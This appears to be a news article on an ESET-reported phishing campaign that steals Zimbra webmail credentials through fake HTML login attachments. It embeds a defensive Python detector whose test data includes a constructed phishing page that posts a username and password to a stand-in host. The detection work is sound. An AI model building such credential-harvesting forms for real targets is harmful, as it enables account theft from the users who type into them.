Be careful if you use Zimbra, the webmail used in particular by Free! A massive phishing campaign uses fake warnings about an email server update or an account deactivation to steal usernames and passwords.
Zimbra webmail is very popular with Free subscribers, French administrations and companies that do not have the means or the desire to pay for the Microsoft suite: France is among the top five countries using Zimbra. Suffice it to say, this popular alternative to enterprise email solutions is a prime target for cybercriminals. ESET Research has uncovered a massive phishing campaign aimed at harvesting the credentials of users of the open-source collaborative software platform, aimed in particular at small and medium-sized businesses and government entities in Europe. It targets Poland, Ukraine, Italy, France and the Netherlands, as well as Latin American countries such as Ecuador. Active since at least April 2023, it is still ongoing. So be careful!
Zimbra phishing: a classic but effective campaign
Although ESET does not describe this malicious operation as technically sophisticated, it can spread easily within a company using Zimbra and cause significant damage. The attackers send messages warning of a mail server update, an account deactivation or some similar issue. The victim is prompted to open an HTML file attached to the message, which is of course malicious. “Hackers take advantage of the fact that HTML attachments contain legitimate code, with the only telltale element being a link pointing to the malicious host, compared to more popular phishing techniques, where a malicious link is placed directly in the body of the email,” explains Viktor Šperka, a researcher at ESET, in a press release.
After opening the attachment, the user is presented with a fake Zimbra login page customized to the targeted organization. “Note that the ‘Username’ field is pre-filled in the login form, which makes it more legitimate,” ESET explains. From there, the scenario is that of a very classic phishing campaign. The HTML file is opened in the victim’s browser, which may lead them to believe they have been directed to the legitimate login page, even though the address bar shows a local file path rather than the organization’s webmail URL. In the background, the credentials typed into the HTML form are sent to a server controlled by the attackers, who then have plenty of time to infiltrate the email account.
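The mechanism described above (a locally opened HTML attachment whose login form submits the typed credentials to a remote host, with the username already filled in) is something a mail gateway or an incident responder can check for automatically. The following Python script is an added example written for this article; it is not code from ESET, from the Zimbra project or from the campaign itself. It parses an HTML attachment with the standard library only and flags any form that contains a password field and submits to a remote host, reporting that host, the pre-filled fields and every external host the file references (the “only telltale element” ESET mentions). The two sample attachments, the `.invalid` hostnames and the `j.doe` username are constructed for illustration and are not indicators from the real campaign.

```python
"""Flag HTML e-mail attachments that behave like credential-harvesting login pages.

Heuristics taken from the campaign described in the article:
  * the attachment is opened from a local file path, so a login form that
    submits to a remote host has no legitimate reason to exist in it;
  * that form contains a password field;
  * a text/e-mail field is pre-filled (value="...") to look more legitimate.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AttachmentScanner(HTMLParser):
    """Collect <form> elements, their inputs and all external hosts referenced."""

    def __init__(self):
        super().__init__()
        self.forms = []           # one dict per <form> seen
        self.external_hosts = set()
        self._current = None      # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        # Record any host referenced by links, scripts, images or form actions.
        for attr in ("href", "src", "action"):
            host = urlparse(a.get(attr) or "").netloc
            if host:
                self.external_hosts.add(host.lower())
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "password": False,
                "prefilled": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            kind = (a.get("type") or "text").lower()
            if kind == "password":
                self._current["password"] = True
            elif kind in ("text", "email") and a.get("value"):
                # Pre-filled username/e-mail field, as in the fake Zimbra page.
                self._current["prefilled"].append((a.get("name") or "", a["value"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html: str) -> list:
    """Return one finding per form that posts a password to a remote host."""
    scanner = _AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for form in scanner.forms:
        host = urlparse(form["action"]).netloc.lower()
        if form["password"] and host:
            findings.append({
                "host": host,
                "method": form["method"],
                "prefilled": form["prefilled"],
                "external_hosts": sorted(scanner.external_hosts),
            })
    return findings


# Constructed sample: what a harvesting attachment of this kind looks like.
# The hostnames use the reserved .invalid TLD and are not real indicators.
SAMPLE_ATTACHMENT = """<html><body>
<h1>Zimbra Web Client</h1>
<form method="post" action="https://mail-update.example.invalid/login.php">
  <label>Username</label>
  <input type="text" name="username" value="j.doe@example.invalid">
  <label>Password</label>
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>"""

# Constructed benign attachment: a local form with no password field.
BENIGN_ATTACHMENT = """<html><body>
<form method="post" action="/search"><input type="text" name="q"></form>
</body></html>"""


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(label, suspicious_forms(doc))
```

Run it on a saved `.html` attachment by reading the file and passing its contents to `suspicious_forms`; a non-empty result means the file would send a password off the machine when the user clicks “Sign In”, which is exactly the behaviour ESET describes. The check is deliberately a heuristic: obfuscated JavaScript that builds the form or the URL at runtime will evade a static parse, so treat an empty result as “nothing obvious”, not as a clean bill of health.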
The researchers repeatedly observed subsequent waves of phishing emails sent from legitimate Zimbra accounts at companies that had previously been targeted. It is likely that the cybercriminals compromised victims’ accounts and created new mailboxes, which were then used in turn to send phishing emails. This is not the first time Zimbra has drawn the attention of cybercriminals. In August and October 2022, several high and critical security vulnerabilities were reported, and last July multiple vulnerabilities were identified again. Some of them could have allowed an attacker “to cause a security problem not specified by the publisher, a circumvention of the security policy and a breach of data confidentiality”, according to CERT-FR. So don’t let your guard down!